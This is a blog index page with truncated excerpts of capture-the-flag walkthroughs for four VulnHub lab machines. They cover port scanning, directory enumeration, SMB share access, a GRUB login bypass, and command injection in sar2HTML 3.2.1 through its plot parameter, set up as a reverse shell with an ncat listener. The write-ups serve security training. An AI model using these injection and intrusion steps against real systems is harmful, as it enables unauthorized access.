Posts

https://www.vulnhub.com/entry/sunset-dawn,341/ System Info Debian 10 Discover Target IP sudo nmap -sn 192.168.122.1-255 Scan Ports `nmap -p- 192.168.122.11 nmap -p 80,139,445,3306 -sC -sV 192.168.122.11 enum4linux -a 192.168.122.11 Port 80 robots.txt does not exist using dirb http://192.168.122.11 we can find http://192.168.122.11/logs/ we can download management.log from it and take a look SMB server Port 139 and port 445 indicate that there is a smb server on the target machine use smbclient -L //dawn to list all the service of it, and we can find shared disk ITDEPT we can log into it by smbclient //dawn/ITDEPT now we are in the smb share, but it is empty if we go back to reading that management....

https://www.vulnhub.com/entry/bbs-cute-102,567/ Fix VM network Debian 10, network is broken in QEMU launch VM, edit GRUB parameters of line linux ..., change ro to rw, and add init=/bin/bash after it to by pass login edit /etc/network/interfaces, change interface name to ours, add auto enp1s0 Discover Target IP sudo nmap -sn 192.168.122.1-255 Scan Ports `nmap -p- 192.168.122.122 nmap -p 22,80,88,110,995 -sC -sV 192.168.122.122 Port 80 This site doesn’t have a robots.txt run dirb http://192....

https://www.vulnhub.com/entry/sar-1,425/ Discover Targer Networks sudo nmap -sn 192.168.122.1-255 sudo nmap -p- 192.168.122.207 Port 80 run dirb http://192.168.122.207 and found http://192.168.122.207/phpinfo.php Visit http://192.168.122.207/robots.txt and foundhttp://192.168.122.207/sar2HTML/ sar2HTML Version 3.2.1 of sar2HTML is vulnerble to remote code execution using URL GET request https://www.exploit-db.com/exploits/47204 Reverse Shell we can add any command after http://192.168.122.207/sar2HTML/index.php?plot=; to run, we can try some options from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md Python we can check if python exist on the machine http://192.168.122.207/sar2HTML/index.php?plot=;which python3 then we can run ncat -nvlp 4444on the attacker’s machine, and go tohttp://192....

https://www.vulnhub.com/entry/cybersploit-1,506/ It’s it running Ubuntu 12.04 LTS, set use its preset in QEMU Discover Target IP sudo nmap -sn 192.168.122.1-255 Scan Ports nmap -p- 192.168.122.181 nmap -p 22,80 -sC -sV 192.168.122.181 sudo nmap -sU 192.168.122.181 scan top 1000 UDP ports Port 80 visit http://192.168.122.181/robots.txt getting R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9 decoding it from base64, and get Flag 1 Good Work ! Flag1: cybersploit{youtube.com/c/cybersploit} dirb http://192.168.122.181 nikto -host 192.168.122.181 if we inspect element view-source:http://192.168.122.181/ of the home page, we will get a username at line 48 <!...